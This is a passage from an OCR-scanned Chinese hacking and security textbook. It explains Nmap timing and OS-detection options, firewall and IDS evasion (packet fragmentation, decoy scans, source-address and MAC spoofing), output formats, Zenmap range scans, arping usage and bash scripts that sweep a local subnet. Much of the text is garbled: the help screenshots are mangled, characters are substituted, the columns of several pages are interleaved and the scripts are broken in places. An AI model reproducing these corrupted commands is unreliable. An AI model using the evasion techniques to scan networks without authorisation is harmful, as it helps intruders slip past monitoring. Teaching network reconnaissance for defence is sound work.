10.1.6 ”系统 判断 一 一 时 间 与 性 能 


通过 Nmap 可 以 对 系统 进行 一 个 判断 ， 
另外 在 扫 拉 过程 中 如 果 扫 描 过 快 可 能 会 触 
发 一 些 报 警 ， 合 理 的 配置 扫描 时 间 既 可 以 
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获取 更 多 的 信息 ， 还 可 以 使 Nmap 发 挥 出 更 
好 的 性 能 。 
下 图 为 其 帮助 信息 。 


0S DETECTION: 

-0: Enable 05 detection 

--05scan-Limit: Limit 05 detection to promising targets 

--0sscan-guess: Guess O05 more aggressively 

TIMING AND PERFORMANCE: 

Options which take <time> are in seconds, or append 'ms' (milliseconds), 

's' (seconds), 'm’' (minutes), or "h' (hours) to the valuye (e.g. 36m) . 

-T<9-5>: Set timing template (higher is faster) 

--Min-hostgroup/max-hostgroup <5size>: Parallel host scan group sizes 

--min-parallelism/max-parallelism <numprobes>: Probe parallelization 

--Min-rtt-timeout/max-rtt-timeout/initial-rtt-timeout <time>: Specifjies 
probe round trip time. 


--max-retries <tries>: Caps number of port scan probe retransmissions. 
--host-timeout <time>: Give up on target after this long 
--Sscan-delay/--max-scan-delay <time>: Adjust delay between probes 
--min-rate <number>: Send packets no slower than <number> per second 
--max-rate <number>: Send packets no faster than <number> per second 


操作 系统 相关 的 参数 说 明 如 下 : 

e -O: 启用 操作 系统 检测 ，-A 可 以 同 
时 局 用 操作 系统 检测 和 版 本 检测 。 

e --osscan-limit: 针对 指定 的 目标 进行 
操作 系统 检测 。 

e@ --osscan-guess: 当 Nmap 无 法 确定 所 
检测 的 操作 系统 时 ， 会 尽 可 能 地 提 
供 最 相近 的 匹配 。 

时 间 及 性 能 相关 的 参数 说 明 如 下 : 

指定 的 时 间 单 位 可 以 是 : ms(millisec- 

onds),s(seconds), m(minutes) 或 者 h(hours)。 

e -T<0-5>: 设置 时 间 模 板 ， 分 别 与 数 
字 0~~5 对 应 ， 前 两 种 模式 用 于 IDS 瞪 
避 ，Polite 模 式 降 低 了 扫描 速度 以 使 
用 更 少 的 带宽 和 目标 主机 资源 。 默 
认 模 式 为 Normal， 因 此 -T3 实 际 上 未 
做 任何 优化 。Agegressive 模 式 假 设 用 
户 具 有 合适 及 可 靠 的 网 络 从 而 加 速 
扫描 。Insane 模 式 假设 用 户 具 有 特别 
快 的 网 络 或 者 为 获取 更 快速 度 而 牺 
牲 准 确 性 。 

e --min-hostgroup/max-hostgroup 
<size>: 调整 并 行 扫描 组 的 大 小 ， 
用 于 保持 组 的 大 小 在 一 个 指定 的 范 
围 之 内 ，Nmap 具 有 并 行 扫 摘 多 主机 
端口 或 版 本 的 能 力 ，Nmap 将 多 个 
目标 IP 地 址 空间 分 成 组 ， 然 后 在 同 
一 时 间 对 一 个 组 进行 扫描 。 通 常 
大 的 组 更 有 效 。 缺 点 是 只 有 当 整 
个 组 扫描 结束 后 才 会 提供 主机 的 


扫 搓 结果 。 

e --min-parallelism/max-parallelism 
<numprobes>: 设置 探测 并 行 数量 。 

e@ --min-rtt-timeout/max-rtt-timeout/ 
initial-rtt-timeout <time>: 设置 rtt 返 
回 时 间 。 

e --max-retries <tries>: 最 大 探测 
数量 。 

e --host-timeout <time>: 目标 主机 超 
时 时 间 ， 超 出 时 间 退 出 扫描 或 跳 过 
该 主机 扫 摘 。 

© --scan-delay/--max-scan-delay 
<time>: 设置 扫描 的 延 时 时 间 ， 每 
次 探测 的 间隔 时 间 。 例 如 : Nmap 
192.168.1.1 --scan-delay 10s， 每 次 探 
测 间隔 10s 再 进行 。 

e --min-rate <number>: 每 秒 发 包 最 小 
数量 。 

e --max-rate <number>: 每 秒 发 包 最 大 
数量 。 


10.1.7” 防火墙/ID9 租 避 和 欺骗 


在 网 络 扫描 中 不 可 避免 地 会 接触 到 
防火 墙 等 网 络 设 备 ，Nmap 提 供 了 以 下 只 
避 机 制 ， 使 用 这 些 参数 设置 相应 的 胃 避 
规则 。 

下 图 为 防火 墙 /IDS 躲 避 和 欺骗 帮助 
信息 。 


J -mtu ea men Sp cke ts Ns ge ey w/given MTU) 
-D <decoy1l， i coy2l, HE Clo th decoys 
-5 i Address> ce ri 
-e <iface>: 


numbe 
ie i 和 co tions thro ugh es proxies 
<hex string>: Append a pe payload to sent packet 
--data- ing < ing>: nd a custo oa str 四 Se 
--data- length <num>: ts randor “dato to t pa 

ne Pe ate 和 cifle d ry optior 


es packets 


ss/pre efix Spoof your MAC address 
ith a to so ep checksum 


参数 说 明 如 下 : 

e -f: --mtu <val>: 将 TCP 头 分 段 在 几 
个 包 中 ， 使 得 包 过 滤器 、 IDS 以 及 
其 他 工具 的 检测 更 加 困难 ，--mtu 指 
定 最 小 MTU 单 元 。 

e@ -D <decoyl,decoy2[,ME],...>: 使 用 
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诱饵 隐蔽 扫描 ， 使 用 去 号 分 隅 每 个 
诱饵 主机 ， 也 可 用 自己 的 真实 IP 作 
为 诱饵 ， 这 时 可 使 用 ME 选项 说 明 。 

如 果 在 第 6 个 位 置 或 更 后 的 位 置 使 
用 ME 选项 ， 一 些 常 用 端口 扫描 检 
测 右 (如 Solar Designer’s excellent 
scanlogd) 就 不 会 报告 这 个 真实 IP。 

如 果 不 使 用 ME 选项 ，Nmap 将 真实 
IP 放 在 一 个 随机 的 位 置 。 

e -S <IP Address>: 源 地 址 欺骗 ， 说 
明 所 需 发 送 包 的 接口 了 地 址 ， 弊 端 
是 无 法 收 到 回 包 。 

e -e <iface>: 指定 网 卡 接口 。 

e -g/--source-port <portnum>: 指定 的 
源 疹 口 。 

e@ --proxies <urll,[url2],..>: 指定 代理 
服务 器 进行 扫描 。 

e@ --data <hex string>: 在 探测 数据 包 中 
加 入 一 些 数 据 ， 让 探测 包 看 上 去 更 


像 正 常数 据 包 。 这 里 加 入 的 数据 是 
十 六 进 制 数 。 

e --data-string <string>: 加 入 字符 串 到 
数据 字段 。 

e --data-length <num>: 限定 数据 的 
长 度 。 

® --ip-options <options>: 加 入 IP 包 头 
的 options 字 段 信 息 。 


e --ttl <val>: 设置 TTL 值 。 

© --spoof-mac <mac address/prefix/ 
vendor name>: MAC 地 址 欺骗 。 

e --badsum: 差错 校 验 ， 使 用 该 参数 
会 发 送 一 些 错 误 校 验 的 数据 包 。 


10.1.8 输出 选项 参数 说 明 


扫描 到 的 结果 如 果 数 据 量 比较 大 不 便 
于 阅读 ， 可 以 使 用 输出 项 中 的 一 些 参数 指 
定 输出 成 不 同 格式 的 文件 。Nmap 提 供 了 方 
便 直 接 查看 的 交互 式 方式 和 方便 软件 处 理 
的 XML 格式 ， 另 外 还 提供 了 选项 来 控制 输 
出 的 细节 以 及 调试 信息 。 
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五 种 不 同 的 输出 格式 如 下 : 

(1) interactive output。 交互 式 输 出 ， 
默认 的 输出 方式 。 

(2) normal output。 显 示 较 少 的 运行 时 
间 信 息 和 告警 信息 。 

(3) XML output。 可 转换 成 HIML， 方 
便 程 序 处 理 。 

(4) grepable output。 在 一 行 中 包含 目 
标 主机 最 多 的 信息 。 

(5) sCRiPt KiDDi3 output 格式 。 以 脚 
本 的 形式 输出 。 

下 图 为 输出 项 的 帮助 信息 。 


DUTPUT: 
-ON/-oX/-0S5/-0G6 <file>: Qutput scan in normal, XML, s|<rlpt kIddi3, 
and Grepable format, respectively, to the given filename. 
-0A <basename>: Output in the three major formats at once 
-Vv: Increase verbosity level (use -vv or more for greater effect) 
-d: Increase debugging level (use -dd or more for greater effect) 
--reason; Display the reason a port is in a particular state 
--open:; Only show open [or possibly open) ports 
--packet-trace; Show all packets sent and received 
--iflist: Print host interfaces and routes (for debugging) 
--append-output: Append to rather than clobber specified output files 
--TESUME <filename>: Resume an aborted scan 
--StyLesheet <path/URL>: XSL stylesheet to transform XML output to HTML 
--webxml: Reference stylesheet from Nmap.0rg for more portable XML 
--Nno-stylesheet: Prevent associating of XSL stylesheet Ww/XML output 


参数 说 明 如 下 : 

e -oN <file>: 标准 输出 。 

e -oX <file>: XML 输 出 写 入 指定 的 
文件 。 

e -0S <file>: 类 似 于 交互 工具 输出 。 

e -0G <file>: Grepable 输 出 。 

e -oA <basename>: 输出 至 所 有 
格式 。 

e -v: 提高 输出 信息 的 详细 度 。 

e -d: 提高 或 设置 调试 级 别 ，9 级 最 高 。 

e --packet-trace: 跟踪 发 送 和 接收 的 
报 文 。 

e --iflist: 输出 检测 到 的 接口 列表 和 系 
统 路 由 。 

e --append-output: 表示 在 输出 文件 中 
添加 ， 而 不 是 覆盖 原文 件 。 

e --resume <filename>: 继续 中 断 的 
扫描 。 

e@ --stylesheet <path or URL>: 设置 
XSL 样 式 表 ， 转 换 XML 输 出 到 
HTML。 在 Web 浏 览 器 中 打开 Nmap 
的 XML 输 出 时 ， 将 会 在 文件 系统 中 
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寻找 Nmap.xsl 文 件 ， 并 使 用 它 输出 
结果 。 

e@ --no-stylesheet: 防止 将 XSL 样 式 表 
与 wWXML 输出 关联 起 来 。 


10.1.9 ”其 他 选项 帮助 信息 


这 里 包括 了 一 些 不 太 明 确 分 类 的 其 他 
选项 ， 以 及 一 些 杂 项 。 下 图 为 这 些 选项 的 
帮助 信息 。 


MISL: 

-6: Enable IPV6 scanning 
-A: Enable O05 detection, version detection, script scanning, and traceroute 
--datadir <dirname>: Specify custom Nmap data file location 
--send-eth/--send-ip: Send using raw ethernet frames or IP packets 
--privileged: Assume that the user is fully privileged 
--Unprivileged: Assume the user lacks raw socket privileges 

-V: Print version number 

-h: Print this help summary page. 


参数 说 明 如 下 : 

e -6: 开启 IPv6 扫 描 。 

e -A: 激烈 扫描 模式 选项 ， 这 个 选项 
局 用 额外 的 高 级 和 高 强度 选项 ， 这 
个 选项 局 用 了 操作 系统 检测 〈-O ) 
和 版 本 扫描 〈-sSV) ， 相 当 于 以 下 扫 
描 的 组 合 。 

e --datadir <dimame>: 说 明 用 户 Nmap 
数据 文件 位 置 。Nmap 在 运行 时 从 
文件 中 获得 特殊 的 数据 ， 这 些 文 
件 有 Nmap-service-probes，Nmap- 


services, Nmap-protocols, Nmap- 
rpc, Nmap-mac-prefixes 和 Nmap-os- 
fingerprints。Nmap 首 先 在 --datadir 
选项 说 明 的 目录 中 碍 找 这 些 文件 。 
未 找到 的 文件 ， 将 在 BMAPDIR 环 
境 变量 说 明 的 目录 中 碍 找 。 接 下 来 
是 用 于 真正 和 有 效 UID 的 ~/.Nmap 
或 Nmap 可 执行 代码 的 位 置 〈 仅 
Windows32) ; 然后 是 编译 位 置 ， 
如 /usr/local/share/Nmap 或 /usr/share/ 
Nmap。Nmap 查 找 的 最 后 一 个 位 置 
是 当前 目录 。 

e --send-eth: 使 用 原 以 太 网 帧 发 送 。 

e --send-ip: 在 原 IP 层 发 送 。 

e --privileged: 假定 用 户 具 有 全 部 
权限 。 


--interactive: 在 交互 模式 下 局 动 。 
-V: 打印 版 本 信息 ， 也 可 表示 为 
--Version 。 

e -h: 打印 一 个 短 的 帮助 屏幕 ， 
表示 为 --help。 


10.1.10” Nmap 图形 模 式 


最 后 使 用 Zenmap 命 令 ， 可 以 开启 Nmap 
图 形 模式 。 其 中 包含 多 种 扫描 选项 ， 它 对 
网 络 中 被 检测 到 的 主机 按照 选择 的 扫描 选 
项 和 显示 结 点 进行 探查 。 用 户 可 以 建立 一 
个 需要 扫描 的 范围 ， 这 样 就 不 需要 再 输入 
大 量 的 IP 地 址 和 主机 名 了 。 

使 用 Nmap 图 形 模式 进行 扫描 的 具体 操 
作 方 法 如 下 : 

[step 图 打开 Nmap 图 形 操作 界面 ， 如 下 图 
所 示 。 


全 Zenmap 一 口 x 
扫 招 加 ”工具 OO ” 配 吾 (P) 六 助 ({H) 
目标 : 忠和 六 :Intense scan v 扫 洁 En 


全 入 :nmap -T4 -A -V 


屋 多 Nmap 边 出 闫 口 /主机 拓扑 主机 明细 扫 撕 


滩 作 系统 4 主机 < 扩 绍 


过 党 主机 


要 扫描 单 台 主机 ， 可 以 在 “目标 ”后 
的 文本 框 内 输入 主机 的 卫 地 址 或 网 址 ; 要 扫 
描 某 个 范围 内 的 主机 ， 可 以 在 该 文本 框 中 
输入 192.168.0.1-150， 如 下 图 所 示 。 


全 Zenmap 一 口 X 
扫 招 问 ”工具 四 配 秋 (帮助 册 ) 


目标 : | 192.168.0.1-150| 本 半 :Intense scan v| | 扫 商 | | 即刻 
合 信 ;| nmap -T4 -A -v 192.168.0.1-150 

民 务 Nmap 办 出 端口 /主机 拓扑 主机 明细 扫 关 

皖 作 系统 4 主机 。 “^ 2 


过 党 主机 
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侈 提示 : 在 扫描 时 ， 还 可 以 用 “*” 替 换 掉 
IP 地 址 中 的 任何 一 部 分 ， 如 “192.168.1.*” 

等 同 于 “192.168.1.1-255”; 要 扫描 一 个 更 
大 范围 内 的 主机 ， 可 以 输入 “192.168 .1， 

2，3.*”， 此 时 将 扫描 “192.168.1.0”“19 
2.168.2.0”“192.168.3.0” 三 个 网 络 中 的 所 
有 地 址 。 


要 设置 网 络 扫描 的 不 同 配置 文件 ， 
可 以 单 击 “配置 ”后 的 下 拉 列 表 框 ， 从 中 
选择 Intense scan、Intense scan plus UDP 和 
Intense scan,all TCP ports 等 选项 ， 从 而 对 网 
络 主 机 进行 不 同方 面 的 扫描 ， 如 下 图 所 示 。 


全 Zenmap 一 口 X 
扫 挡 (a) 工具 中 ” 配 辐 (9) 帮助 (H) 


目标 ，| 192.168.0.1-150 配置 : | Intense scan 扫 俐 | 如 尝 
命令 ，|nmap -T4 -A -v 192.168.0.1-150 Intense scan ~ 
Intense scan plus UDP 
ed Nmap 榨 出 庙 口 /主机 Intense scan, all TCP ports 
操作 系统 4 三 机 和 Intenac scan no ping EE 
Ping scan 
Quick scan 
Quick scan plus 


Quick traceroute 
Regular scan 


Slow comprehensve scan 


过 污 主 机 


单 击 “ 扫 描 ” 按 钮 开始 扫描 ， 稍 等 一 
会 儿 ， 即 可 在 “Nmap 输 出 ”选项 卡 中 显示 
扫描 信息 ， 在 扫描 结果 信息 中 ， 可 以 看 到 扫 
描 对 象 当 前 开放 的 端口 信息 ， 如 下 图 所 示 。 


全 Zecnmap 一 口 ~ 
当 控 和 ) 工 呈 号 ” 配 到 从) 大助 时 ) 


目标 192.168.0.1-150 ~| 配 和 于 :1ntense scan v| | 扫 敬 | | 芭 洁 

命令 ; nmap -T4 -A -v 192.168.0.1-150 

服务 。。。 Nmap 办 出 党 D 主 机 托 赴 ， 主 机 明明 扩 

拓 作 系统 4 主机 .mmsp -Td -A -rv 192.158.0.1-150 v| 5 | 用 入 
ort for 192.168.6.145 [host down] 人 


scan te rt for 192.168.0.149 [host dGown] 
Nmap scan report for 492.168.0.156 [host down] 


2:41 
at 12:41, ©@ @l1s elapsed 


n hosts EL/ 
ered open a p on 192.168.0.106 
Discover = open port 445/tcp on 192.168.0.112 
ered open port 139/tcp on 192.168.0.106 
rp COVEF ee open port i39/tcp on 192.168.0.112 
Discovered open port 135/ ee on 192.168.0.106 
Discovered open port 135/tcp on 192.168.0.112 
overed El i a gg 
overed open port 2869/tcp on 192.168.6.166 
Discovered open port 2869/tcp on 192.168.8.112 
Discovera 


vered ppen port 5357/tcp on 192.168.B.112 
Discover open port 1 192.1 0.1 
Comnpleted SYM Stealth S against 192.168.0.186 in 7.93s (2 hosts 


Conpleted SYM Steslth Scan 
left) 
Completed SYI stealth Scan 


aEainst 192.168.9.112 in 7.94s (1 host 


过 计 主 机 at 12:41, 7.96s elapsed 【39698 total Vv 


选择 “端口 /主机 ”选项 卡 ， 在 打开 
的 界面 中 可 以 看 到 当前 主机 显示 的 端口 、 
协议 、 状 态 和 服务 信息 ， 如 下 图 所 示 。 
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二 黑客 攻防 与 无 线 受 全 从 新 手 到 高 手 ( 超 值 版 ) 


np a :和 选项 卡 ， grep ne 
Ex 192.168.0.1-150 ~| 配 晤 Intense xcan ~| ss BE 有 如 端口 、 协议 、 状态 ， 如 下 图 所 示 。 


命令 :nmap -1T4 -A -v 192.168.0.1-150 


服务 。 Nmap 输出 宕 口 /主机 括 站 主机 明 组 = 半 


一 口 X 

作 系 索 4 主机 访 4 党 口 4 协议 4 状 志 4 服务 4 版 本 

口 192.168.0.1 @ 0 tp open htp , 

#1921630104 | 鲁 1900 tcp cpen upnp 192.168.0.106 :苦口 (2 大千 口 (0998) 特 玫 字 自 

和 192.168.0.106 192.168.0.112 总 口 4 协议 4 状态 4 服务 4 方法 

便 192.168.0.112 192 168.0.104 由 80 tcp open http probed 

外 1900 tcp open upnp table 
< 
这 店主 机 
、 [1 39 、 

选择 “拓扑 ”选项 卡 ， 在 打开 的 界 


面 中 可 以 查看 当前 网 络 中 计算 机 的 拓扑 结 
构 ， 如 下 图 所 示 。 选择 “路 由 追踪 ”选项 卡 ， 在 打开 的 
界面 中 可 以 查看 当前 主机 的 路 由 器 信息 ， 


全 Zenmap 一 口 x Se 
扫 疙 (a) 工具 四， 配 轨 (P) 帮助 1 如 下 图 所 ; ~o 
村 192.168.0.1-150 >| BE | Intense scon ~| as BE 


命令 ; nmap -14 -A -v 192.168.0.1-150 


服务 ”Nmap 检 出 关口 /主机 拓 站 主机 明 性 拉 关 


作 系 坟 4 主机 ~ “ 坎 寺 主机 信息 | Fisheye 摊 作 本 板 Legend | 保存 到 去 
[ 19216804 192.168.0.106 
192.168.0.104 192.168.0.112 
外 192.168.0.106 192.168.0.104 
三 ”192.168.0.112 
O 1666104 


<b>/=b>= 端 口 路 由 追踪 信息 总 共 <=b>1<b> 次 已 知 的 中 


单 击 “ 查 看 主机 信息 ”按钮 ， 打 开 
“二 而 主机 信息 "全 口 ， 在 其 中 可 以 查看 [step 园 在 Nmap 操 作 界 面 中 选择 “主机 明 

当前 主机 的 一 般 信息 、 操 作 系 统 信息 等 ， ， 细 ”选项 卡 ， 在 打开 的 界面 中 可 以 查看 当 
如 下 图 所 示 。 前 主机 的 明细 信息 ， 包 括 主机 状态 、 地 址 
一 上 x] 列表、 操作 系统 等 ， 如 下 图 所 示 。 


全 Zenmap 一 口 Xx 


192.168.0.106 扫 迫 a) 工 呈 号 ” 配 吾 (6) 帮助 上 册 ) 
192.168.0.112 地 址 : [pvd] 192.158.01 本 目 款 。 192.168.0.1-150 ~| 本 号 Intense scan ~| | 后 | 区 
192.168.0.104 加 本 命令 ; nmap -1T4 -A -v 192.168.0.1-150 

主机 名 : 


服务 。 Nmap 办 出 党 /主机 托 赴 “主机 明志 反光 


最 后 启动 : Wed Aug 02 03:42:45 2017 [1155577 种 )。 


作 系 壳 4 主机 习 ;192.168.0.1; 
日 操作 系统 口 192.168.0.1 了 ES 
-一 < 所 192.168.0.104 状态 up 
mbes Ea 届 192.168.0.106 aD: 2 Ey 
|e - 掉 过 尝 苇 口 ， 998 
类 别 ， 老 纹 192.168.0.112 
% 4 名 称 已 扫 注 闭口 : 1000 
| 98 Canon imageRUNNER C5185 printer 本 上 冯 对 则 :， 1155577 Rid 
> 乓 后 宫 动 : ”Wed Aug 02 03:42:45 2017 
己 地 址 列表 
日 序列 IPv4 192.168.0.1 
Ipv6 寺 知 


MAC 闻 址 ， F4;83:CD:3350:73 


在 查 看 主机 信息 四 窗 口 中 选择 服 过 生机 本 Canon imageRUNNER C5185 printer v 
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二 层 打折 


数据 链 路 层 的 数据 单位 为 帧 ， 主 要 分 
为 : 逻辑 链 路 控制 (LLC) 和 介质 访问 控 
制 (MAC)， 其 中 主要 的 协议 是 ARP (Ad- 
dress Resolution Protocol， 地 址 解析 协议 ) 
协议 ， 它 将 32 位 IP 地 址 解析 为 48 位 以 太 网 
地 址 ， 需 要 注意 的 是 ，ARP 协 议 对 应 二 层 
广播 包 ， 而 广播 包 是 无 法 通过 路 由 或 网 天 
访问 外 部 地 址 的 。 


10.2 


10.2.1 使 用 arping 命 令 


使 用 arping 命 令 回 局 域 网 内 的 其 他 主机 
发 送 ARP 请 求 的 指令 ， 可 以 用 来 测试 局 域 
网 内 的 某 个 IP 是 否 已 被 使 用 ， 其 中 被 使 用 的 
IP 地 址 为 在 线 主 机 。 命 令 格式 如 下 : 


[-AbDfhaUV] 
[-s sourcel] 


arpind 
deadlinel] 


参数 说 明 如 下 : 
-A: ARP 回 复 模式 ， 更 新 邻居 。 
-b: 保持 广播 。 
-D: 复制 地 址 检测 模式 。 
-f: 得 到 第 一 个 回复 就 退出 。 
-q: 不 显示 警告 信息 。 
-U: 主动 的 ARP 模 式 ， 更 新 邻居 。 
可 选择 参数 介绍 如 下 : 
e -c: 发 送 的 数据 包 的 数目 。 
e -w: 设置 超时 时 间 。 
e -I: 使 用 指定 的 以 太 网 设备 ， 默 认 
情况 下 使 用 eth0。 
e -s: 指定 源 IP 地 址 。 
© -h: 显示 帮助 信息 。 
e -V: 显示 版 本 信息 。 
使 用 arpping 命 令 查 询 IP 地 址 或 MAC 地 
址 的 操作 步骤 如 下 : 
查看 某 个 IP 地 址 的 MAC 地 址 ， 使 用 
arping 192.168.1.1 命 令 ， 执 行 效果 如 下 图 所 
示 。 如 果 数 据 包 正确 返回 ， 则 都 会 包含 一 
个 bytes form 字 上 段 。 


[I=e Zountl T= 
[-I interfacel] 
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FooftgKkaLILI:- 冰 arping 192.168.1.1 
ARPING 192.168.1.1 


5650 bytes from lc:fa:68:01:2f;08 (192.168.1.1): index=1 time=947.757 USecC |° 
650 bytes from lc:fa:68:01:2f;98 (192.168.1.1): index=2 time=1.457 msec 


EC 

-- 192.168.1.1 statistics --- 

B packets transmitted, 3 packets received, 0% unanswered (0 extra) 
rtt min/avg/max/std-dev = 0.273/0.893/1.457/0.485 ms 


在 查询 某 个 IP 地 址 的 MAC 地 址 时 ， 

如 果 想 在 发 送 ARP 数 据 包 的 过 程 中 ， 指 
定 ARP 数 据 包 的 数量 ， 可 以 使 用 arping 一 
c 1 192.168.1.1 命 令 ， 执 行 效 果 如 下 图 
所 示 。 


rootQkaLi:-# arping -c2 192.168.1.1 

ARPING 192.168.1.1 

60 bytes from lc:fa:;68:601;2f:;08 [192.166.1.1): index=0 time=1.265 msec 
E60 bytes from lc:fa:68:01:2f:08 (192.168.1.1): index=1 time=340.555 Usec 


-- 192.168.1.1 statistics --- 
2 packets transmitted, 2 packets received, Og% unanswered (0 extra) 
rtt min/avqaq/max/std-dev = 0.341/0.803/1.265/0.462 ms 


当 有 多 块 网 卡 时 ， 需 要 指定 特定 的 设 
备 来 发 送 ARP 数 据 包 ， 这 时 需要 使 用 arping 
-TIeth0 -c 1 192.168.1.1 命 令 ， 执 行 效 果 如 下 
图 所 示 。 


root@kali:-~# arping -i eth9o -c 1 192.168.1.1 
ARPING 192.168.1.1 
60 bytes from lc:fa:68:01:21:068 (192.168.1.1): index=0 time=930.65990 usec 


-- 192.168.1.1 statistics --- 
1 packets transmitted, 1 packets received, gs unanswered (9 extra) 
rtt min/avg/max/std-dev = 0.931/0.931/8.931/8.608 ms 


查看 某 个 IP 是 否 被 不 同 的 MAC 占 
用 ， 这 时 可 以 使 用 arping -d 192.168.1.15 命 
令 ， 执 行 效果 如 下 图 所 示 。 如 果 存 在 被 不 
同 MAC 占 用 的 情况 ， 则 有 可 能 是 ARP 地 址 
欺骗 。 


rooTtekali:~# arping -d I92.1I68.I.I5 
ARPING 192.168.1.15 

Timeout 

Timeout 

Timeout 


-- 192.168.1.15 statistics --- 
B packets transmitted, 0 pacxets received, 100% unanswered (9 extra) 


查看 菜 个 MAC 地 址 的 人 P 地 址 ， 需 要 在 
同一 子 网 中 才能 查 到 ， 这 时 需要 使 用 arping 
-c 100-25-22-F9-5F-44 命 令 ， 执 行 效果 如 下 
图 所 示 。 


root@kali:-~# arping -C 1 00-25-22-F9-5F-44 

arping: lookup dev: No matching interface found using getifaddrs|(). 

arping: Unable to automatically find interface to use. Is it on the local LAN? 
arping: Use -i to manually specify interface. Guessing interface ethg0 . 

IARPING 688-25-22-F9-5F-44 

Timeout 


--- 886-25-22-F9-5F-44 statistics --- 
1 packets transmitted, 9 packets received, 19g% Unanswered (6 extra) 


确定 MAC 和 IP 的 对 应 情况 ， 使 用 
arping -c 1-T 192.168.1.100 00-25-22-F9- 
5SF-44 命 令 ， 执 行 效果 如 下 图 所 示 。 
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50 bytes from lc:fa:68:01:2f;08 (192.168.1.1): index=0 time=272.866 Usec Te 


黑客 攻防 与 无 线 巡 全 从 新 手 到 高 手 ( 超 值 版 ) 


root@kali:-# arping -c 1 -T 192.168.1.106 00-25-22-F9-5F-44 
ARPING 00-25-22-F9-5SF-44 


Timeout 


-- 99-25-22-F9-5F-44 statistics --- 
1 packets transmitted, 0 packets received, 10@% unanswered (9 extra) 


侈 提示 : 如 果 想 要 确定 IP 和 MAC 对 应 情 
况 ， 可 以 使 用 arping -c 1-t 00:13:72:f9:ca:60 
192.168.1.1S 命 令 来 确定 。 


有 时 ， 本 地 查 不 到 某 主 机 ， 可 以 
让 网 关 或 其 他 机 器 去 查 。 这 时 使 用 arping 
-C 1-S 10.240.1600.1 -s 88:33:92:12:cl: 
cl110.240.162.115 命 令 或 者 arping-c 1-S 
10.240.160.110.240.162.115 命 令 都 可 以 ， 执 
行 效果 如 下 图 所 示 。 


root@kali:-# arping -C1 -5 10.240.160.1] -5 88:5a:92:12:Cl:cl 16.246.162.115 
arping: lookup dev: No matching interface found Using getifaddrs ( ) . 
arping: Unable to automatically find interface to use. Is it on the local LAN? 
arping: Use -i to manually specify interface. Guessing interface ethe. 

RPING 10.240.162.115 

imeout 


-- 18.240.162.115 statistics --- 
1 packets transmitted, © packets received, 180% unanswered (9 extra) 


通过 Wireshark 工 具 抓 取 ARP 数 据 包 ， 
其 中 二 层 以 太 网 信息 如 下 图 所 示 ， 其 中 包 
括 目 标 地 址 与 源 地 址 ， 可 以 看 出 目标 地 址 
为 广播 地 址 。 
~ Ethernet II, Src: Vnware 39:f2:9¢ (00:0C:29:39:f2:9c), Dst: Broadcast (FTF:fTFf:TF:FTF:FTF:TF) | 
» Destination: Broadcast (ff:ff:ff:ff:ff:ff) 
Source; Vmware_39:;f2:;9c {00:0C:29:;39:f2:;9c) 


Type: ARP {9x98065) 
Trailer: 96909999996BBBBB8966969909996BBBBB 


使 用 Wireshark 工 具 探 测 到 的 ARP 协 
议 ， 其 具体 数据 如 下 图 所 示 。 


~ Address Resolution Protocol] (request ) 
Hardware type: Ethernet (1) 
Protocol type: IPv4 (0Qx0800) 
Hardware size: 6 
Protocol] size: 4 
Opcode: request {1) 
Sender MAC address: Vmware_39:f2:9c (800:Q0c:29:39:f2:9c) 
Sender IP address: 192.168.1.101 
Target MAC address: 00:00:00 00:00:00 (00:00:00:00:00:00) 
Target IP address: 192.168.1.1 


当 目 标 地 址 存在 即 会 返回 MAC 地 
址 ， 如 果 不 存 在 则 不 会 返回 。 返 回 的 ARP 
响应 数据 包 如 下 图 所 示 ， 这 就 是 对 探测 数 
据 包 进行 的 回应 。 


~ Address Resolution Protocol (reply) 
Hardware type: Ethernet (1) 
Protocol type: IPv4 (9x9869 ) 
Hardware size: 6 
Protocol size: 4 
Opcode: reply (2) 
Sender MAC address: Tp-LinkT_ 61:2f:068 (ic:fa:68:01:2f:08) 
Sender IP address: 192.168.1.1 
Target MAC address: Vmware 39:f2:9c (00:0c:29:39:f2:9c) 
Target IP address: 192.168.1.101 


使 用 管道 筛选 可 以 截取 出 存在 主机 
的 IP 地 址 ， 这 时 使 用 arping -c 1 192.168. 
1.1|grep"bytes from'"jcut -d" " -f Slcut -d 
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"(mf 2|cut -d")"-f 1 命令 ， 执 行 效果 如 下 图 
所 示 。 


root@kali:-~# arping 
cut -d" " -f5|cut -d"(" 
192.168.1.1 


参数 说 明 如 下 : 
© orep “bytes from” : 
主机 。 
e cut-d“”-f5: 是 以 空格 作为 区 分 
截取 第 五 行 的 信息 。 
e cut -4“(”-f 2: 去 除 IP 地 址 前 面 的 
"(" 括 号。 
e@ cut -d4“)”-f 1: 
"括号 。 
除 上 述 介 绍 的 内 容 外 ， 有 用户 还 可 以 使 
用 shell 脚 本 来 实现 目 动 化 扫描 ， 下 面 是 脚本 
文件 ， 该 脚本 遍历 sth0 网 卡 的 整个 网 段 ， 具 
体 代码 如 下 : 


-C 1 192.168.1.1|grep ' es from" | 
-f 2|cut -d")" -f 


是 截取 存活 


去 除 IP 地 址 后 面 的 


#!/bin/bash # 使 用 哪 种 脚本 进行 解释 固定 
格式 ,这 里 用 的 是 Bshell 

if [ "$#" -ne 1 ]; then # 参 数 不 等 于 1 
给 出 提示 信息 


echo "Usage - ./arping.sh [interface]" 


echo "Excample - ./arping.sh eth0" 
echo 


Scan of the local subnet to which etho 


"Example will perform an ARP 


is assigned" 


exit 

fi 

二 和 3 # 第 一 个 参数 赋 给 
interface 变 量 

# 取 出 网 卡 信息 中 的 IP 地 址 


prefix=$ (ifconfig S$interface | grep 
i 下 

for addr in $(seq 1 254) ;do # 定 义 一 个 
adqr 变 量 取 值 为 一 个 序列 遍历 整个 网 段 

# 将 IP 地 址 组 装 发 出 arping 包 

darpang “ol Sorertisec Saddr el 
i i es 
一 二 

done 


还 可 以 编写 用 于 读 取 文本 的 脚本 ， 
脚本 可 以 读 取 指定 文件 ， 并 扫 搬 文件 中 给 
定 的 人 PP 地址， 具体 代码 如 下 : 


#!/bin/bash 
if [ "S$#" -ne 1 ] ;then 


grep 
dD el a 


echo "Usage - ./arping.sh [interface]" 
echo "Excample - ./arping.sh file" 

echo "Example will perform an ARP 
Scan of the local subnet to which eth0 


is assigned" 


exit 

fi file=$1 

for addr in $(cat S$file) ;do # 读 取 指 定 文件 

arping -cc 1 S$addr | grep "bytes 
OIC ss le ss Se 1 1 ms Head ee BS: 


| cut =d"}"™" =£f 1 
done 


( 侈 注意 : 执行 脚本 前 需 先 修改 脚本 文件 的 


执行 权限 ， 如 果 没 有 执行 权限 会 报错 ， 这 
里 可 以 通过 chmod 755 < 脚本 名 称 > 命 令 来 使 
